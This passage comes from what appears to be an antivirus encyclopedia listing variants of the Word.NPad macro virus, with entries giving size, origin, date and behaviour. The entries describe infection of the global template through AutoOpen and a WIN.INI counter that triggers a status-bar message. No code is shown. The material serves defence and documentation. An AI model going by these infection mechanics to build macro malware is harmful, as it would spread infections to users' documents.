  22258. NPad.C is a minor variant based on the older NPad.A virus.
  22259. The only difference between the two viruses is that NPad.C is
  22260. a corrupted variant, with some bytes being patches from the NPad.A
  22261. virus.
  22262.  
  22263. As a result of the corruption, NPad.C only executes some of its
  22264. virus code. Infection of the global template and further
  22265. documents still works, yet NPad.C never displays the scrolling
  22266. message from the original NPad.A virus. Instead it displays a
  22267. WordBasic error message.
  22268.  
  22269.  
  22270. [Word_NPad.D]
  22271. Virus name: Word.NPad.D
  22272. Virus Type: Word macro virus
  22273. Number of macros: 1
  22274. Encrypted: Yes
  22275. Macro names: AutoOpen
  22276. Size of macros: 1831 Bytes
  22277. Place of origin: Indonesia
  22278. Date of origin: January 1997
  22279. Destructive: No
  22280. Seen In-The-Wild: No
  22281. Description:
  22282.  
  22283. NPad.D is a minor variant based on the older NPad.A virus.
  22284. The only difference between the two viruses is that NPad.D is
  22285. a corrupted variant, with some bytes being patches from the
  22286. NPad.A virus.
  22287.  
  22288. As a result of the corruption, NPad.D only executes some of
  22289. its virus code. Infection of the global template and further
  22290. documents still works, yet NPad.D never displays the scrolling
  22291. message from the original NPad.A virus. Instead it displays a
  22292. WordBasic error message.
  22293.  
  22294.  
  22295. [Word_NPad.E]
  22296. Virus name: Word.NPad.E
  22297. Virus Type: Word macro virus
  22298. Number of macros: 1
  22299. Encrypted: Yes
  22300. Macro names: AutoOpen
  22301. Size of macros: 1831 Bytes
  22302. Place of origin: Unknown
  22303. Date of origin: January 1997
  22304. Destructive: No
  22305. Seen In-The-Wild: No
  22306. Description:
  22307.  
  22308. NPad.E is a minor variant based on the older NPad.A virus.
  22309. The only difference between the two viruses is that NPad.E is
  22310. a corrupted variant, with some bytes being patches from the
  22311. NPad.A virus.
  22312.  
  22313. As a result of the corruption, NPad.E only executes some of its
  22314. virus code. Infection of the global template and further
  22315. documents still works, yet NPad.E never displays the scrolling
  22316. message from the original NPad.A virus. Instead it displays a
  22317. WordBasic error message.
  22318.  
  22319.  
  22320. [Word_NPad.F]
  22321. Virus name: Word.NPad.F
  22322. Virus Type: Word macro virus
  22323. Number of macros: 1
  22324. Encrypted: Yes
  22325. Macro names: AutoOpen
  22326. Size of macros: 1831 Bytes
  22327. Place of origin: Unknown
  22328. Date of origin: January 1997
  22329. Destructive: No
  22330. Seen In-The-Wild: No
  22331. Description:
  22332.  
  22333. NPad.F is a minor variant based on the older NPad.A virus.
  22334. The only difference between the two viruses is that NPad.F is
  22335. a corrupted variant, with some bytes being patches from the
  22336. NPad.A virus.
  22337.  
  22338. As a result of the corruption, NPad.F only executes some of its
  22339. virus code. Infection of the global template and further
  22340. documents still works, yet NPad.F never displays the scrolling
  22341. message from the original NPad.A virus. Instead it displays a
  22342. WordBasic error message.
  22343.  
  22344.  
  22345. [Word_NPad.G]
  22346. Virus name: Word.NPad.G
  22347. Virus Type: Word macro virus
  22348. Number of macros: 1
  22349. Encrypted: Yes
  22350. Macro names:  AutoOpen
  22351. Size of macros: 1831 Bytes
  22352. Place of origin: Unknown
  22353. Date of origin: January 1997
  22354. Destructive: No
  22355. Seen In-The-Wild: No
  22356. Description:
  22357.  
  22358. NPad.G is a minor variant based on the older NPad.A virus.
  22359. The only difference between the two viruses is that NPad.G is
  22360. a corrupted variant, with some bytes being patches from the
  22361. NPad.A virus.
  22362.  
  22363. As a result of the corruption, NPad.G only executes some of its
  22364. virus code. Infection of the global template and further documents
  22365. still works, yet NPad.G never displays the scrolling message from
  22366. the original NPad.A virus. Instead it displays a WordBasic error
  22367. message.
  22368.  
  22369.  
  22370. [Word_NPad.I]
  22371. Virus name: Word.NPad.I
  22372. Virus Type: Word macro virus
  22373. Number of macros: 1
  22374. Encrypted: Yes
  22375. Macro names: AutoOpen
  22376. Size of macros: 1831 Bytes
  22377. Place of origin: Unknown
  22378. Date of origin: January 1997
  22379. Destructive: No
  22380. Seen In-The-Wild: No
  22381. Description:
  22382.  
  22383. NPad.I is a minor variant based on the older NPad.A virus.
  22384. The only difference between the two viruses is that NPad.I is a
  22385. corrupted variant, with some bytes being patches from the
  22386. NPad.A virus.
  22387.  
  22388. As a result of the corruption, NPad.I only executes some of its
  22389. virus code. Infection of the global template and further documents
  22390. still works, yet NPad.I never displays the scrolling message from
  22391. the original NPad.A virus. Instead it displays a WordBasic error
  22392. message.
  22393.  
  22394.  
  22395.  
  22396. [Word_NPad.M]
  22397. Virus name: Word.NPad.M
  22398. Virus Type: Word macro virus
  22399. Number of macros: 1
  22400. Encrypted: Yes
  22401. Macro names: AutoOpen
  22402. Size of macros: 1831 Bytes
  22403. Place of origin: Unknown
  22404. Date of origin: 1997
  22405. Destructive: No
  22406. Seen In-The-Wild: No
  22407. Description:
  22408.  
  22409. NPad.I is a minor variant based on the older NPad.A virus.
  22410. The only difference between the two viruses is that NPad.I is a
  22411. corrupted variant, with some bytes being patches from the
  22412. NPad.A virus.
  22413.  
  22414. As a result of the corruption, NPad.I only executes some of its
  22415. virus code. Infection of the global template and further documents
  22416. still works, yet NPad.I never displays the scrolling message from
  22417. the original NPad.A virus. Instead it displays a WordBasic error
  22418. message.
  22419.  
  22420.  
  22421. [Word_NPad.AB]
  22422. Virus name: Word.NPad.AB
  22423. Virus Type: Word macro virus
  22424. Number of macros: 1
  22425. Encrypted: Yes
  22426. Macro names: AutoOpen
  22427. Size of macros: 1831 Bytes
  22428. Place of origin: Unknown
  22429. Date of origin: 1996
  22430. Destructive: No
  22431. Seen In-The-Wild: No
  22432. Description:
  22433.  
  22434. The only difference between this new variant and previous
  22435. NPad viruses is that NPad.AB has some minor code
  22436. modifications.
  22437.  
  22438. NPad.AB modifies the "compatibility" section inside the
  22439. WIN.INI file. It adds a counter under the name of "NPAD328"
  22440. and each time the virus is activated, it adds 1 to its value.
  22441. Upon reaching a value of 23 it resets the counter and displays
  22442. the following message in the status bar:
  22443.  
  22444. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22445.  
  22446. It infects the global template when an infected document is
  22447. opened. Further documents become infected when they are
  22448. also opened (AutoOpen).
  22449.  
  22450.  
  22451. [Word_NPad.AD]
  22452. Virus name: Word.NPad.AD
  22453. Virus Type: Word macro virus
  22454. Number of macros: 1
  22455. Encrypted: Yes
  22456. Macro names: AutoOpen
  22457. Size of macros: 1831 Bytes
  22458. Place of origin: Unknown
  22459. Date of origin: Spring 1997
  22460. Destructive: No
  22461. Seen In-The-Wild: No
  22462. Description:
  22463.  
  22464. The only difference between this new variant and previous
  22465. NPad viruses is that NPad.AD has some corrupted codes.
  22466.  
  22467. As a result of the corruption, NPad.AD only executes some of
  22468. its virus codes. Npad.AD infects the global template (normal.dot)
  22469. when an infected document in opened. Further documents
  22470. become infected when they are also opened.
  22471.  
  22472.  
  22473. [Word_NPad.AE]
  22474. Virus name: Word.NPad.AE
  22475. Virus Type: Word macro virus
  22476. Number of macros: 1
  22477. Encrypted: Yes
  22478. Macro names: AutoOpen
  22479. Size of macros: 1831 Bytes
  22480. Place of origin: Unknown
  22481. Date of origin: Spring 1997
  22482. Destructive: No
  22483. Seen In-The-Wild: No
  22484. Description:
  22485.  
  22486. The only difference between this new variant and previous
  22487. NPad viruses is that NPad.AE has some corrupted codes.
  22488.  
  22489. As a result of the corruption, NPad.AE only executes some of
  22490. its virus codes. Npad.AE infects the global template (normal.dot)
  22491. when an infected document in opened. Further documents
  22492. become infected when they are also opened.
  22493.  
  22494.  
  22495. [Word_NPad.AF]
  22496. Virus name: Word.NPad.AF
  22497. Virus Type: Word macro virus
  22498. Number of macros: 1
  22499. Encrypted: Yes
  22500. Macro names: AutoOpen
  22501. Size of macros: 1831 Bytes
  22502. Place of origin: Unknown
  22503. Date of origin: Spring 1997
  22504. Destructive: No
  22505. Seen In-The-Wild: No
  22506. Description:
  22507.  
  22508. The only difference between this new variant and previous
  22509. NPad viruses is that NPad.AF has some minor code
  22510. modifications and a corrupted counter.
  22511.  
  22512. Infection of the global template occurs when an infected
  22513. document is opened. Further documents become infected when
  22514. they are also opened (AutoOpen).
  22515.  
  22516.  
  22517. [Word_NPad.AG]
  22518. Virus name: Word.NPad.AG
  22519. Virus Type: Word macro virus
  22520. Number of macros: 1
  22521. Encrypted: Yes
  22522. Macro names: AutoOpen
  22523. Size of macros: 1831 Bytes
  22524. Place of origin: Unknown
  22525. Date of origin: Spring 1997
  22526. Destructive: No
  22527. Seen In-The-Wild: No
  22528. Description:
  22529.  
  22530. The only difference between this new variant and previous
  22531. NPad viruses is that NPad.AG has some corrupted codes.
  22532.  
  22533. As a result of the corruption, NPad.AG only executes some of
  22534. its virus codes. Npad.AG infects the global template (normal.dot)
  22535. when an infected document in opened. Further documents
  22536. become infected when they are also opened.
  22537.  
  22538.  
  22539. [Word_NPad.AH]
  22540. Virus name: Word.NPad.AH
  22541. Virus Type: Word macro virus
  22542. Number of macros: 1
  22543. Encrypted: Yes
  22544. Macro names: AutoOpen
  22545. Size of macros: 1831 Bytes
  22546. Place of origin: Unknown
  22547. Date of origin: Spring 1997
  22548. Destructive: No
  22549. Seen In-The-Wild: No
  22550. Description:
  22551.  
  22552. The only difference between this new variant and previous
  22553. NPad viruses is that NPad.AH has some corrupted codes.
  22554.  
  22555. As a result of the corruption, NPad.AH only executes some of
  22556. its virus codes. Npad.AH infects the global template (normal.dot)
  22557. when an infected document in opened. Further documents
  22558. become infected when they are also opened.
  22559.  
  22560.  
  22561. [Word_NPad.AI]
  22562. Virus name: Word.NPad.AI
  22563. Virus Type: Word macro virus
  22564. Number of macros: 1
  22565. Encrypted: Yes
  22566. Macro names: AutoOpen
  22567. Size of macros: 1831 Bytes
  22568. Place of origin: Unknown
  22569. Date of origin: Spring 1997
  22570. Destructive: No
  22571. Seen In-The-Wild: No
  22572. Description:
  22573.  
  22574. The only difference between this new variant and previous
  22575. NPad viruses is that NPad.AI has some corrupted codes.
  22576.  
  22577. As a result of the corruption, NPad.AI only executes some of its
  22578. virus codes. Npad.AI infects the global template (normal.dot)
  22579. when an infected document in opened. Further documents
  22580. become infected when they are also opened.
  22581.  
  22582.  
  22583. [Word_NPad.AJ]
  22584. Virus name: Word.NPad.AJ
  22585. Virus Type: Word macro virus
  22586. Number of macros: 1
  22587. Encrypted: Yes
  22588. Macro names: AutoOpen
  22589. Size of macros: 1831 Bytes
  22590. Place of origin: Unknown
  22591. Date of origin: Spring 1997
  22592. Destructive: No
  22593. Seen In-The-Wild: No
  22594. Description:
  22595.  
  22596. The only difference between this new variant and previous
  22597. NPad viruses is that NPad.AJ has some corrupted codes.
  22598.  
  22599. As a result of the corruption, NPad.AJ only executes some of its
  22600. virus codes. Npad.AJ infects the global template (normal.dot)
  22601. when an infected document in opened. Further documents
  22602. become infected when they are also opened.
  22603.  
  22604.  
  22605. [Word_NPad.AK]
  22606. Virus name: Word.NPad.AK
  22607. Virus Type: Word macro virus
  22608. Number of macros: 1
  22609. Encrypted: Yes
  22610. Macro names: AutoOpen
  22611. Size of macros: 1831 Bytes
  22612. Place of origin: Unknown
  22613. Date of origin: Spring 1997
  22614. Destructive: No
  22615. Seen In-The-Wild: No
  22616. Description:
  22617.  
  22618. The only difference between this new variant and previous
  22619. NPad viruses is that NPad.AK has some minor code
  22620. modifications.
  22621.  
  22622. NPad.AK modifies the "compatibility" section inside the
  22623. WIN.INI file. It adds a counter under the name of "NPAD328"
  22624. and each time the virus is activated, it adds 1 to its value.
  22625. Upon reaching a value of 23 it resets the counter and displays
  22626. the following message in the status bar:
  22627.  
  22628. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22629.  
  22630. It infects the global template when an infected document is
  22631. opened.  Further documents become infected when they are
  22632. also opened (AutoOpen).
  22633.  
  22634.  
  22635. [Word_NPad.AM]
  22636. Virus name: Word.NPad.AM
  22637. Virus Type: Word macro virus
  22638. Number of macros: 1
  22639. Encrypted: Yes
  22640. Macro names: AutoOpen
  22641. Size of macros: 1831 Bytes
  22642. Place of origin: Unknown
  22643. Date of origin: Spring 1997
  22644. Destructive: No
  22645. Seen In-The-Wild: No
  22646. Description:
  22647.  
  22648. The only difference between this new variant and previous
  22649. NPad viruses is that NPad.AM has some corrupted codes.
  22650.  
  22651. As a result of the corruption, NPad.AM only executes some of
  22652. its virus codes. Npad.AM infects the global template when an
  22653. infected document in opened. Further documents become infected
  22654. when they are also opened.
  22655.  
  22656.  
  22657. [Word_NPad.AN]
  22658. Virus name: Word.NPad.AN
  22659. Virus Type: Word macro virus
  22660. Number of macros: 1
  22661. Encrypted: Yes
  22662. Macro names: AutoOpen
  22663. Size of macros: 1831 Bytes
  22664. Place of origin: Switzerland
  22665. Date of origin: Spring 1997
  22666. Destructive: No
  22667. Seen In-The-Wild: No
  22668. Description:
  22669.  
  22670. The only difference between this new variant and previous
  22671. NPad viruses is that NPad.AN has some corrupted codes.
  22672.  
  22673. As a result of the corruption, NPad.AN only executes some of
  22674. its virus codes. Npad.AN infects the global template (normal.dot)
  22675. when an infected document in opened. Further documents
  22676. become infected when they are also opened.
  22677.  
  22678.  
  22679. [Word_NPad.AO]
  22680. Virus name: Word.NPad.AO
  22681. Virus Type: Word macro virus
  22682. Number of macros: 1
  22683. Encrypted: Yes
  22684. Macro names: AutoOpen
  22685. Size of macros: 1831 Bytes
  22686. Place of origin: Unknown
  22687. Date of origin: Spring 1997
  22688. Destructive: No
  22689. Seen In-The-Wild: No
  22690. Description:
  22691.  
  22692. The only difference between this new variant and previous
  22693. NPad viruses is that NPad.AO has some minor code
  22694. modifications.
  22695.  
  22696. NPad.AO modifies the "compatibility" section inside the
  22697. WIN.INI file. It adds a counter under the name of "NPAD328"
  22698. and each time the virus is activated, it adds 1 to its value.
  22699. Upon reaching a value of 23 it resets the counter and displays
  22700. the following message in the status bar:
  22701.  
  22702. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22703.  
  22704. It infects the global template when an infected document is
  22705. opened.  Further documents become infected when they are
  22706. also opened (AutoOpen).
  22707.  
  22708.  
  22709. [Word_NPad.AP]
  22710. Virus name: Word.NPad.AP
  22711. Virus Type: Word macro virus
  22712. Number of macros: 1
  22713. Encrypted: Yes
  22714. Macro names: AutoOpen
  22715. Size of macros: 1831 Bytes
  22716. Place of origin: Unknown
  22717. Date of origin: Spring 1997
  22718. Destructive: No
  22719. Seen In-The-Wild: No
  22720. Description:
  22721.  
  22722. The only difference between this new variant and previous
  22723. NPad viruses is that NPad.AP has some minor code
  22724. modifications and a corrupted payload.
  22725.  
  22726. As a result of the corruption, NPad.AP only executes some of
  22727. its virus codes. Infection of the global template occurs when
  22728. an infected document is opened. Further documents become
  22729. infected when they are also opened (AutoOpen).
  22730.  
  22731.  
  22732. [Word_NPad.AQ]
  22733. Virus name: Word.NPad.AQ
  22734. Virus Type: Word macro virus
  22735. Number of macros: 1
  22736. Encrypted: Yes
  22737. Macro names: AutoOpen
  22738. Size of macros: 1831 Bytes
  22739. Place of origin: Unknown
  22740. Date of origin: Spring 1997
  22741. Destructive: No
  22742. Seen In-The-Wild: No
  22743. Description:
  22744.  
  22745. The only difference between this new variant and previous
  22746. NPad viruses is that NPad.AQ has some minor code
  22747. modifications and a corrupted payload.
  22748.  
  22749. As a result of the corruption, NPad.AQ only executes some of
  22750. its virus codes. Infection of the global template occurs when an
  22751. infected document is opened. Further documents become
  22752. infected when they are also opened (AutoOpen).
  22753.  
  22754.  
  22755. [Word_Npad.AS]
  22756. Virus name: Word.NPad.AS
  22757. Virus Type: Word macro virus
  22758. Number of macros: 1
  22759. Encrypted: Yes
  22760. Macro names: AutoOpen
  22761. Size of macros: 1831 Bytes
  22762. Place of origin: Unknown
  22763. Date of origin: Spring 1997
  22764. Destructive: No
  22765. Seen In-The-Wild: No
  22766. Description:
  22767.  
  22768. The only difference between this new variant and previous
  22769. NPad viruses is that NPad.AS has some minor code
  22770. modifications and a corrupted payload.
  22771.  
  22772. As a result of the corruption, NPad.AS only executes some of its
  22773. virus codes. Infection of the global template occurs when an
  22774. infected document is opened. Further documents become  infected when
  22775. they are also opened (AutoOpen).
  22776.  
  22777.  
  22778. [Word_NPad.AU]
  22779. Virus name: Word.NPad.AU
  22780. Virus Type: Word macro virus
  22781. Number of macros: 1
  22782. Encrypted: Yes
  22783. Macro names: AutoOpen
  22784. Size of macros: 1831 Bytes
  22785. Place of origin: Australia
  22786. Date of origin: Spring 1997
  22787. Destructive: No
  22788. Seen In-The-Wild: No
  22789. Description:
  22790.  
  22791. The only difference between this new variant and previous
  22792. NPad viruses is that NPad.AU has some minor code
  22793. modifications and a corrupted payload.
  22794.  
  22795. As a result of the corruption, NPad.AU only executes some of
  22796. its virus codes. Infection of the global template occurs when an
  22797. infected document is opened. Further documents become
  22798. infected when they are also opened (AutoOpen).
  22799.  
  22800.  
  22801. [Word_Npad.AV]
  22802. Virus name: Word.NPad.AV
  22803. Virus Type: Word macro virus
  22804. Number of macros: 1
  22805. Encrypted: Yes
  22806. Macro names: AutoOpen
  22807. Size of macros: 1831 Bytes
  22808. Place of origin: Unknown
  22809. Date of origin: Spring 1997
  22810. Destructive: No
  22811. Seen In-The-Wild: No
  22812. Description:
  22813.  
  22814. The only difference between this new variant and previous
  22815. NPad viruses is that NPad.AV has some minor code
  22816. modifications and a corrupted payload.
  22817.  
  22818. As a result of the corruption, NPad.AV only executes some of
  22819. its virus codes. Infection of the global template occurs when an
  22820. infected document is opened. Further documents become
  22821. infected when they are also opened (AutoOpen).
  22822.  
  22823.  
  22824. [Word_Npad.AW]
  22825. Virus name: Word.NPad.AW
  22826. Virus Type: Word macro virus
  22827. Number of macros: 1
  22828. Encrypted: Yes
  22829. Macro names: AutoOpen
  22830. Size of macros: 1831 Bytes
  22831. Place of origin: Netherlands
  22832. Date of origin: Spring 1997
  22833. Destructive: No
  22834. Seen In-The-Wild: No
  22835. Description:
  22836.  
  22837. The only difference between this new variant and previous
  22838. NPad viruses is that NPad.AW has a one-byte code
  22839. modification.
  22840.  
  22841. NPad.AW modifies the "compatibility" section inside the
  22842. WIN.INI file. It adds a counter under the name of "NPAD328"
  22843. and each time the virus is activated, it adds 1 to its value. Upon
  22844. reaching a value of 23 it resets the counter and displays the
  22845. following message in the status bar:
  22846.  
  22847. "   DOEUNPAD94 v 2.21 (c) Maret 1996 Bandung, Indonesia   "
  22848.  
  22849. It infects the global template when an infected document is
  22850. opened.  Further documents become infected when they are
  22851. also opened (AutoOpen).
  22852.  
  22853.  
  22854. [Word_NPad.AX]
  22855. Virus name; Word.NPad.AX
  22856. Virus Type: Word macro virus
  22857. Number of macros: 1
  22858. Encrypted: Yes
  22859. Macro names: AutoOpen
  22860. Size of macros: 1831 Bytes
  22861. Place of origin: Unknown
  22862. Date of origin: Spring 1997
  22863. Destructive: No
  22864. Seen In-The-Wild: No
  22865. Description:
  22866.  
  22867. The only difference between this new variant and previous
  22868. NPad viruses is that NPad.AX has some minor code
  22869. modifications and a corrupted payload.
  22870.  
  22871. As a result of the corruption, NPad.AX only executes some of
  22872. its virus codes. Infection of the global template occurs when an
  22873. infected document is opened. Further documents become
  22874. infected when they are also opened (AutoOpen).
  22875.  
  22876.  
  22877. [Word _NPad.AY]
  22878. Virus Name: Word.NPad.AY
  22879. Virus Type: Word macro virus
  22880. Number of macros: 1
  22881. Encrypted: Yes
  22882. Macro names: AutoOpen
  22883. Size of macros: 1831 Bytes
  22884. Place of origin: Unknown
  22885. Date of origin: Spring 1997
  22886. Destructive: No
  22887. Seen In-The-Wild: No
  22888. Description:
  22889.  
  22890. The only difference between this new variant and previous
  22891. NPad viruses is that NPad.AY has some minor code
  22892. modifications and a corrupted payload.
  22893.  
  22894. As a result of the corruption, NPad.AY only executes some of
  22895. its virus codes. Infection of the global template occurs when an
  22896. infected document is opened. Further documents become
  22897. infected when they are also opened (AutoOpen).
  22898.  
  22899.  
  22900. [Word_NPad.AZ]
  22901. Virus name: Word.NPad.AZ
  22902. Virus Type: Word macro virus
  22903. Number of macros: 1
  22904. Encrypted: Yes
  22905. Macro names: AutoOpen
  22906. Size of macros: 1831 Bytes
  22907. Place of origin: Unknown
  22908. Date of origin: Spring 1997
  22909. Destructive: No
  22910. Seen In-The-Wild: No
  22911. Description:
  22912.  
  22913. The only difference between this new variant and previous
  22914. NPad viruses is that NPad.AZ has some minor code
  22915. modifications and a corrupted payload.
  22916.  
  22917. As a result of the corruption, NPad.AZ only executes some of
  22918. its virus codes. Infection of the global template occurs when an
  22919. infected document is opened. Further documents become
  22920. infected when they are also opened (AutoOpen).
  22921.  
  22922.  
  22923. [Word_NPad.BA]
  22924. Virus name: Word.NPad.BA
  22925. Virus Type: Word macro virus
  22926. Number of macros: 1
  22927. Encrypted: Yes
  22928. Macro names: AutoOpen
  22929. Size of macros: 1831 Bytes
  22930. Place of origin: Unknown
  22931. Date of origin: Spring 1997
  22932. Destructive: No
  22933. Seen In-The-Wild: No
  22934. Description:
  22935.  
  22936. The only difference between this new variant and previous
  22937. NPad viruses is that NPad.BA has some minor code
  22938. modifications and a corrupted payload.
  22939.  
  22940. As a result of the corruption, NPad.BA only executes some of
  22941. its virus codes. Infection of the global template occurs when an
  22942. infected document is opened. Further documents become
  22943. infected when they are also opened (AutoOpen).
  22944.  
  22945.  
  22946. [Word _NPad.BC]
  22947. Virus name: Word.NPad.BC
  22948. Virus Type: Word macro virus
  22949. Number of macros: 1
  22950. Encrypted: Yes
  22951. Macro names: AutoOpen
  22952. Size of macros: 1831 Bytes
  22953. Place of origin: Australia
  22954. Date of origin: Spring 1997
  22955. Destructive: No
  22956. Seen In-The-Wild: No
  22957. Description:
  22958.  
  22959. The only difference between this new variant and previous
  22960. NPad viruses is that NPad.BC has some minor code
  22961. modifications and a corrupted payload.
  22962.  
  22963. As a result of the corruption, NPad.BC only executes some of
  22964. its virus codes. Infection of the global template occurs when an
  22965. infected document is opened. Further documents become
  22966. infected when they are also opened (AutoOpen).
  22967.  
  22968.  
  22969. [Word_NPad.BD]
  22970. Virus name: Word.NPad.BD
  22971. Virus Type: Word macro virus
  22972. Number of macros: 1
  22973. Encrypted: Yes
  22974. Macro names: AutoOpen
  22975. Size of macros: 1831 Bytes
  22976. Place of origin: Unknown
  22977. Date of origin: Spring 1997
  22978. Destructive: No
  22979. Seen In-The-Wild: No
  22980. Description:
  22981.  
  22982. The only difference between this new variant and previous
  22983. NPad viruses is that NPad.BD has some minor code
  22984. modifications and a corrupted payload.
  22985.  
  22986. As a result of the corruption, NPad.BD only executes some of
  22987. its virus codes. Infection of the global template occurs when an
  22988. infected document is opened. Further documents become
  22989. infected when they are also opened (AutoOpen).
  22990.  
  22991.  
  22992. [Word_NPad.BE]
  22993. Virus name: Word.NPad.BE
  22994. Virus Type: Word macro virus
  22995. Number of macros: 1
  22996. Encrypted: Yes
  22997. Macro names: AutoOpen
  22998. Size of macros: 1831 Bytes
  22999. Place of origin: Unknown
  23000. Date of origin: Spring 1997
  23001. Destructive: No
  23002. Seen In-The-Wild: No
  23003. Description:
  23004.  
  23005. The only difference between this new variant and previous
  23006. NPad viruses is that NPad.BE has some minor code
  23007. modifications and a corrupted payload.
  23008.  
  23009. As a result of the corruption, NPad.BE only executes some of
  23010. its virus codes. Infection of the global template occurs when an
  23011. infected document is opened. Further documents become
  23012. infected when they are also opened (AutoOpen).
  23013.  
  23014.  
  23015. [Word_NPad.BF]
  23016. Virus name: Word.NPad.BF
  23017. Virus Type: Word macro virus
  23018. Number of macros: 1
  23019. Encrypted: Yes
  23020. Macro names: AutoOpen
  23021. Size of macros: 1831 Bytes
  23022. Place of origin: Unknown
  23023. Date of origin: Spring 1997
  23024. Destructive: No
  23025. Seen In-The-Wild: No
  23026. Description:
  23027.  
  23028. The only difference between this new variant and previous
  23029. NPad viruses is that NPad.BF has some minor code
  23030. modifications and a corrupted payload.
  23031.  
  23032. As a result of the corruption, NPad.BF only executes some of
  23033. its virus codes. Infection of the global template occurs when an
  23034. infected document is opened. Further documents become
  23035. infected when they are also opened (AutoOpen).
  23036.  
  23037.  
  23038. [Word_NPad.BG]
  23039. Virus name: Word.NPad.BG
  23040. Virus Type: Word macro virus
  23041. Number of macros: 1
  23042. Encrypted: Yes
  23043. Macro names: AutoOpen
  23044. Size of macros: 1831 Bytes
  23045. Place of origin: Unknown
  23046. Date of origin: Spring 1997
  23047. Destructive: No
  23048. Seen In-The-Wild: No
  23049. Description:
  23050.  
  23051. The only difference between this new variant and previous
  23052. NPad viruses is that NPad.BG has some minor code
  23053. modifications and a corrupted payload.
  23054.  
  23055. As a result of the corruption, NPad.BG only executes some of
  23056. its virus codes. Infection of the global template occurs when an
  23057. infected document is opened. Further documents become
  23058. infected when they are also opened (AutoOpen).
  23059.  
  23060.  
  23061. [Word_NPad.BI]
  23062. Virus name: Word.NPad.BI
  23063. Virus Type: Word macro virus
  23064. Number of macros: 1
  23065. Encrypted: Yes
  23066. Macro names: AutoOpen
  23067. Size of macros: 1831 Bytes
  23068. Place of origin: Unknown
  23069. Date of origin: Spring 1997
  23070. Destructive: No
  23071. Seen In-The-Wild: No
  23072. Description:
  23073.  
  23074. The only difference between this new variant and previous
  23075. NPad viruses is that NPad.BI has some minor code
  23076. modifications and a corrupted payload.
  23077.  
  23078. As a result of the corruption, NPad.BI only executes some of its
  23079. virus codes. Infection of the global template occurs when an
  23080. infected document is opened. Further documents become
  23081. infected when they are also opened (AutoOpen).
  23082.  
  23083.  
  23084. [Word_NPad.H]
  23085. Virus name: Word.NPad.H
  23086. Virus Type: Word macro virus
  23087. Number of macros: 1
  23088. Encrypted: Yes
  23089. Macro names: AutoOpen
  23090. Size of macros: 1831 Bytes
  23091. Place of origin: Unknown
  23092. Date of origin: 1996
  23093. Destructive: No
  23094. Seen In-The-Wild: No
  23095. Description:
  23096.  
  23097. The only difference between this new variant and previous
  23098. NPad viruses is that NPad.H has some minor code
  23099. modifications and a corrupted payload.
  23100.  
  23101. As a result of the corruption, NPad.H only executes some of its
  23102. virus codes. Infection of the global template and further
  23103. documents still works, yet NPad.H never displays the scrolling
  23104. message from the original NPad.A virus.
  23105.  
  23106.  
  23107. [Word_NPad.J]
  23108. Virus name: Word.NPad.J
  23109. Virus Type: Word macro virus
  23110. Number of macros: 1
  23111. Encrypted: Yes
  23112. Macro names: AutoOpen
  23113. Size of macros: 1831 Bytes
  23114. Place of origin: Unknown
  23115. Date of origin: 1996
  23116. Destructive: No
  23117. Seen In-The-Wild: No
  23118. Description:
  23119.  
  23120. The only difference between this new variant and previous
  23121. NPad viruses is that NPad.J has some minor code
  23122. modifications and a corrupted payload.
  23123.  
  23124. As a result of the corruption, NPad.J only executes some of its
  23125. virus codes. Infection of the global template and further
  23126. documents still works, yet NPad.J never displays the scrolling
  23127. message from the original NPad.A virus.
  23128.  
  23129.  
  23130. [Word_NPad.K]
  23131. Virus name: Word.NPad.K
  23132. Virus Type: Word macro virus
  23133. Number of macros: 1
  23134. Encrypted: Yes
  23135. Macro names: AutoOpen
  23136. Size of macros: 1831 Bytes
  23137. Place of origin: Unknown
  23138. Date of origin: 1996
  23139. Destructive: No
  23140. Seen In-The-Wild: No
  23141. Description:
  23142.  
  23143. The only difference between this new variant and previous
  23144. NPad viruses is that NPad.K has some minor code
  23145. modifications and a corrupted payload.
  23146.  
  23147. As a result of the corruption, NPad.K only executes some of its
  23148. virus codes. Infection of the global template and further
  23149. documents still works, yet NPad.K never displays the scrolling
  23150. message from the original NPad.A virus.
  23151.  
  23152.  
  23153. [Word_NPad.L]
  23154. Virus name: Word.NPad.L
  23155. Virus Type: Word macro virus
  23156. Number of macros: 1
  23157. Encrypted: Yes
  23158. Macro names: AutoOpen
  23159. Size of macros: 1831 Bytes
  23160. Place of origin: Unknown
  23161. Date of origin: 1996
  23162. Destructive: No
  23163. Seen In-The-Wild: No
  23164. Description:
  23165.  
  23166. The only difference between this new variant and previous
  23167. NPad viruses is that NPad.L has some minor code
  23168. modifications and a corrupted payload.
  23169.  
  23170. As a result of the corruption, NPad.L only executes some of its
  23171. virus codes. Infection of the global template and further
  23172. documents still works, yet NPad.L never displays the scrolling
  23173. message from the original NPad.A virus.
  23174.  
  23175.  
  23176. [Word_NPad.O]
  23177. Virus name: Word.NPad.O
  23178. Virus Type: Word macro virus
  23179. Number of macros: 1
  23180. Encrypted: Yes
  23181. Macro names: AutoOpen
  23182. Size of macros: 1831 Bytes
  23183. Place of origin: Unknown
  23184. Date of origin: 1996
  23185. Destructive: No
  23186. Seen In-The-Wild: No
  23187. Description:
  23188.  
  23189. The only difference between this new variant and previous
  23190. NPad viruses is that NPad.O has some minor code
  23191. modifications and a corrupted payload.
  23192.  
  23193. As a result of the corruption, NPad.O only executes some of its
  23194. virus codes. Infection of the global template and further
  23195. documents still works, yet NPad.O never displays the scrolling
  23196. message from the original NPad.A virus.
  23197.  
  23198.  
  23199. [Word_NPad.P]
  23200. Virus name: Word.NPad.P
  23201. Virus Type: Word macro virus
  23202. Number of macros: 1
  23203. Encrypted: Yes
  23204. Macro names: AutoOpen
  23205. Size of macros: 1831 Bytes
  23206. Place of origin: Unknown
  23207. Date of origin: 1996
  23208. Destructive: No
  23209. Seen In-The-Wild: No
  23210. Description:
  23211.  
  23212. The only difference between this new variant and previous
  23213. NPad viruses is that NPad.P has some minor code
  23214. modifications and a corrupted payload.
  23215.  
  23216. As a result of the corruption, NPad.P only executes some of its
  23217. virus codes. Infection of the global template and further
  23218. documents still works, yet NPad.P never displays the scrolling
  23219. message from the original NPad.A virus.
  23220.  
  23221.  
  23222. [Word_NPad.Q]
  23223. Virus name: Word.NPad.Q
  23224. Virus Type: Word macro virus
  23225. Number of macros: 1
  23226. Encrypted: Yes
  23227. Macro names: AutoOpen
  23228. Size of macros: 1831 Bytes
  23229. Place of origin: Unknown
